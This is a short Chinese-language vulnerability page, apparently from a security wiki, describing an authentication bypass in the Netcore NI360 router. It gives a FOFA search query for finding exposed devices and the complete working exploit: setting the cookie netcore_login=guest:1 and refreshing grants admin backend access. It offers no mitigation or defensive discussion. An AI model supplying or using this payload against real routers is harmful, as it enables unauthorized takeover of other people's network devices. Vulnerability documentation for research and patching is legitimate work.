# 磊科 NI360路由器 认证绕过漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

磊科 NI360路由器 存在认证绕过漏洞，通过添加特定的Cookie字段获取后台权限

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

> 磊科 NI360路由器

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="Netcore"

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhrYbLZtHHSDhh51TEl%2F-Mhr_5oL_uphlO6em_Nj%2Fimage.png?alt=media\&token=5756ec42-d012-4cfb-8c9e-4be64f7737ea)

添加 Cookie字段 : **netcore\_login=guest:1**

刷新后登录后台

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhrYbLZtHHSDhh51TEl%2F-Mhr_8BTYvofQdaF8MBN%2Fimage.png?alt=media\&token=99a5ea01-fd3b-4310-8482-01d8c556a647)